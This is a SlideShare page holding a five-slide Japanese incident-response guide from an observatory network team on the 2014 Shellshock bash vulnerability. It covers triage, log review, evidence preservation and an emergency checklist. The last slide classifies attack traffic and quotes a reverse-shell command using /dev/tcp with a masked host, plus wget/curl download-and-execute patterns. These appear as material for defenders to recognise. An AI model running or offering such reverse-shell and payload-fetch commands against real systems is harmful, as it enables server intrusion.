SlideShare a Scribd company logo
Submit Search
Upload
Bash 脆弱性祭から抜け出そう
Report
Share
Masafumi Oe
助教 at 国立天文台
Follow
•
13 likes
•
3,865 views
1
of
5
Bash 脆弱性祭から抜け出そう
•
13 likes
•
3,865 views
Report
Share
Download Now
Download to read offline
Technology
CVE-2014-6271 shell shock 脆弱性をチェックするための手順書です。NAOJ NOC作成
Read more
Masafumi Oe
助教 at 国立天文台
Follow
Recommended
Python02 by
Python02
XMLProJ2014
614 views
•
36 slides
msysgit1.8.0でプロンプトにブランチ名を表示させる by
msysgit1.8.0でプロンプトにブランチ名を表示させる
Kenichi Yamada
370 views
•
10 slides
Word pressのテーマは firephpでハックすれば 良かったのか by
Word pressのテーマは firephpでハックすれば 良かったのか
Hisateru Tanaka
2.4K views
•
47 slides
Pukiwiki コメントスパム対策 / 電波時計で NTP by
Pukiwiki コメントスパム対策 / 電波時計で NTP
Kenichiro MATOHARA
1.2K views
•
20 slides
プログラミング作法 by
プログラミング作法
Kota Uchida
3.5K views
•
27 slides
Rustのタスクモデルについて by
Rustのタスクモデルについて
zigen
1.9K views
•
49 slides
More Related Content
Viewers also liked
Mplsj2013 100 gを使い切るnaoj sdn by
Mplsj2013 100 gを使い切るnaoj sdn
Masafumi Oe
1.1K views
•
30 slides
Ip qo s functional requirements by
Ip qo s functional requirements
wael-b1
1.1K views
•
85 slides
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM) by
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Kentaro Ebisawa
9.7K views
•
19 slides
201406ルーター開発イントロダクション by
201406ルーター開発イントロダクション
Masafumi Oe
3.8K views
•
29 slides
QoS by
QoS
Gopan Govindan
2.1K views
•
20 slides
QoS (quality of service) by
QoS (quality of service)
Sri Safrina
8.4K views
•
34 slides
Viewers also liked
(7)
Mplsj2013 100 gを使い切るnaoj sdn by Masafumi Oe
Mplsj2013 100 gを使い切るnaoj sdn
Masafumi Oe
•
1.1K views
Ip qo s functional requirements by wael-b1
Ip qo s functional requirements
wael-b1
•
1.1K views
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM) by Kentaro Ebisawa
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Kentaro Ebisawa
•
9.7K views
201406ルーター開発イントロダクション by Masafumi Oe
201406ルーター開発イントロダクション
Masafumi Oe
•
3.8K views
QoS by Gopan Govindan
QoS
Gopan Govindan
•
2.1K views
QoS (quality of service) by Sri Safrina
QoS (quality of service)
Sri Safrina
•
8.4K views
Quality of Service by Abhishek Wadhwa
Quality of Service
Abhishek Wadhwa
•
37.6K views
More from Masafumi Oe
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力 by
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Masafumi Oe
11K views
•
28 slides
How to install WWLAN card on Thinkpad X1 Carbon by
How to install WWLAN card on Thinkpad X1 Carbon
Masafumi Oe
1.5K views
•
5 slides
ワイヤレス・ワイヤードにおける広帯域通信 2 by
ワイヤレス・ワイヤードにおける広帯域通信 2
Masafumi Oe
2.4K views
•
69 slides
Overview of Satellite based Internet service and architecture in Japan by
Overview of Satellite based Internet service and architecture in Japan
Masafumi Oe
872 views
•
15 slides
Janog震災時におけるインターネットアクセスの役割 by
Janog震災時におけるインターネットアクセスの役割
Masafumi Oe
544 views
•
10 slides
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる by
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
Masafumi Oe
2.5K views
•
40 slides
More from Masafumi Oe
(8)
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力 by Masafumi Oe
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Masafumi Oe
•
11K views
How to install WWLAN card on Thinkpad X1 Carbon by Masafumi Oe
How to install WWLAN card on Thinkpad X1 Carbon
Masafumi Oe
•
1.5K views
ワイヤレス・ワイヤードにおける広帯域通信 2 by Masafumi Oe
ワイヤレス・ワイヤードにおける広帯域通信 2
Masafumi Oe
•
2.4K views
Overview of Satellite based Internet service and architecture in Japan by Masafumi Oe
Overview of Satellite based Internet service and architecture in Japan
Masafumi Oe
•
872 views
Janog震災時におけるインターネットアクセスの役割 by Masafumi Oe
Janog震災時におけるインターネットアクセスの役割
Masafumi Oe
•
544 views
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる by Masafumi Oe
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
Masafumi Oe
•
2.5K views
Interop 2013 ORC ULTRA200 Project by Masafumi Oe
Interop 2013 ORC ULTRA200 Project
Masafumi Oe
•
1.1K views
The importance of connecting stability by Masafumi Oe
The importance of connecting stability
Masafumi Oe
•
592 views
Recently uploaded
The Things Stack説明資料 by The Things Industries by
The Things Stack説明資料 by The Things Industries
CRI Japan, Inc.
58 views
•
29 slides
JJUG CCC.pptx by
JJUG CCC.pptx
Kanta Sasaki
6 views
•
14 slides
さくらのひやおろし2023 by
さくらのひやおろし2023
法林浩之
96 views
•
58 slides
IPsec VPNとSSL-VPNの違い by
IPsec VPNとSSL-VPNの違い
富士通クラウドテクノロジーズ株式会社
430 views
•
8 slides
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20... by
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...
NTT DATA Technology & Innovation
120 views
•
42 slides
SNMPセキュリティ超入門 by
SNMPセキュリティ超入門
mkoda
355 views
•
15 slides
Recently uploaded
(11)
The Things Stack説明資料 by The Things Industries by CRI Japan, Inc.
The Things Stack説明資料 by The Things Industries
CRI Japan, Inc.
•
58 views
JJUG CCC.pptx by Kanta Sasaki
JJUG CCC.pptx
Kanta Sasaki
•
6 views
さくらのひやおろし2023 by 法林浩之
さくらのひやおろし2023
法林浩之
•
96 views
IPsec VPNとSSL-VPNの違い by 富士通クラウドテクノロジーズ株式会社
IPsec VPNとSSL-VPNの違い
富士通クラウドテクノロジーズ株式会社
•
430 views
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20... by NTT DATA Technology & Innovation
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...
NTT DATA Technology & Innovation
•
120 views
SNMPセキュリティ超入門 by mkoda
SNMPセキュリティ超入門
mkoda
•
355 views
SSH応用編_20231129.pdf by icebreaker4
SSH応用編_20231129.pdf
icebreaker4
•
335 views
Windows 11 information that can be used at the development site by Atomu Hidaka
Windows 11 information that can be used at the development site
Atomu Hidaka
•
88 views
Keycloakの全体像: 基本概念、ユースケース、そして最新の開発動向 by Hitachi, Ltd. OSS Solution Center.
Keycloakの全体像: 基本概念、ユースケース、そして最新の開発動向
Hitachi, Ltd. OSS Solution Center.
•
60 views
定例会スライド_キャチs 公開用.pdf by Keio Robotics Association
定例会スライド_キャチs 公開用.pdf
Keio Robotics Association
•
111 views
速習! PostgreSQL専用HAソフトウェア: Patroni(PostgreSQL Conference Japan 2023 発表資料) by NTT DATA Technology & Innovation
速習! PostgreSQL専用HAソフトウェア: Patroni(PostgreSQL Conference Japan 2023 発表資料)
NTT DATA Technology & Innovation
•
18 views
Bash 脆弱性祭から抜け出そう
1.
Bash 脆弱性祭から抜け出そう 0)bashが入ってない(/bin/sh=bashである場合あり、sh--version)なら不正アク
セス可能性なし 1)Bashを実行するcgi/ pl/ shといったwebコードがなければ、不正アクセス可能 性なし 2)ある場合 • Cgi/ shが、bashを実行する場合、不正アクセス可能性あり • CentOS/RedHutのように/bin/sh= bash の場合は、shでも不正アクセス可能性あり • Perlは、system() やexec, `(バッククォート)`でシステムシェル(=bash or /bin/sh=bash)が起動する部分があるなら、不正アクセス可能性あり 例)ls–l * みたいなメタ文字 • 無論明示的に、bash(や/bin/sh)を実行したら、アウト • ここまでで、不正アクセス可能性ありの場合は次に進む。 2014/10/3 大江将史 NAOJ NOC / 1
2.
Bash 脆弱性祭から抜け出せない (前提)bash脆弱性により、UserAgentやcookie
経由など、環境変数経由で「任意」のコー ドを実行できる。 • Cookieはアクセスログに残らないので、何をされたかがわからない。 3)2の問題CGI等がアクセスログにてアクセスされてなかったら、不正アクセス可能性なし • ただし、他の脆弱性が放置されていたなら、書き換えされてるかもしれませんので、グレーです。 4)3でアクセスログがある場合、不正アクセス可能性があり、解析必要 • UserAgnetの記録をみて、“不正アクセスの分類”から脅威を把握する • Cookie経由など“なにをしたか”記録が残らない場合もあるので、アクセス元IPアドレスを解析する。 • 他に当該IPから他コンテンツへのアクセスがないなど、通常の利用がない場合は、不正アクセス可能性あり • 実行されたコードが、suexecなど、権限昇格する場合は、[緊急対応]へ 5)不正アクセス可能性ありの場合 不正アクセスされたとしても焦って再起動とかしない。 サーバ解析チェックリストを実行、NOCへ連絡 2014/10/3 大江将史 NAOJ NOC / 2
3.
サーバー解析チェックリスト 1. 全プロセス(ps)とnetstat–naを記録する
2. /tmp/var/tmpなど、apacheの稼働権限で書き込めるディレクトリをコピーするなど、保全する。 3. サーバーのユーザーに対して、注意喚起する。 ssh公開認証の秘密鍵を配置し、パスフレーズがない場合は、特に注意する。 4. Webサーバを一旦停止する 自動起動しないようにする 5. 不審なプロセスと通信のチェック Apache等の稼働権限で動作するプロセスを再度チェックする。 動作してたら、精査、killする前に、次のnetstatチェックをする Netstatで、tcp/udpセッションを確認し、不審な通信がないかどうかをチェックする。 IRCサーバへの通信、バックシェル用途のTCP listen、ESTABLISHEDなTCPセッションをチェック Suexecなど、実行権限の確認 権限がweb serverと異なる場合は、緊急 6. システムを再起動 5の項目を再チェック WEBサーバを再起動して、5の項目を再チェック 4のチェックに問題など発見がなければ、サービスを復旧させ、ユーザーへその旨通知する。 ただし、限りない白に近いグレーな状態であることを理解する。 2014/10/3 大江将史 NAOJ NOC / 3
4.
[緊急対応] 権限昇格のshell実行された •
権限昇格により、パスワードや各ユーザーのファイルなどの奪取やサーバの改ざんされた 可能性がある。 • 初動対応 • NOCへ連絡 • 以下の要点をサーバのアカウントユーザーへ緊急連絡する。 • ホームディレクトリ下のファイルが流失した可能性があること • パスワードやSSHの秘密鍵が流出した可能性があること、パスワード変更、SSH公開鍵を廃棄すること • この間のアクセス中の入出力内容が流出した可能性があること • サーバ全体の正常性が担保できていないこと • 当該サーバと関連するサーバはすべて管理者を除いて、ロックアウトすること。 • 関連サーバのユーザーへも連絡すること。 • 対応 • 作業内容を詳細に逐次記録し、ここまでの経緯も可能な限り記録すること。 • サーバー解析チェックリスト4を実施し、可能な限りプロセスなどを記録・チェックすること。 • サーバを停止し、ディスクを保全すること。 • 関連サーバ上で同様の解析を開始すること。対応困難などなら、関連サーバを停止すること。 2014/10/3 大江将史 NAOJ NOC / 4
5.
Bash 不正アクセスの分類 •
プローブ活動(セーフ) • Ping • Echo • Bash –c id (以下は、脅威となります。) • リバースシェル • Sh–i> & /dev/tcp/****/12345 0>&1 • ダウンロード • wget/ curl/lwp-download • ダウンロード&実行(&消去) • /var/tmp等へwgetして、perlやshellを持ち込んで実行、ついでに消す • IRCへ接続(war等) 各コマンドのアプリケーションが実在するかどうかをチェックする。実在なければ、不正アクセス可能 性は低い。 2014/10/3 大江将史 NAOJ NOC / 5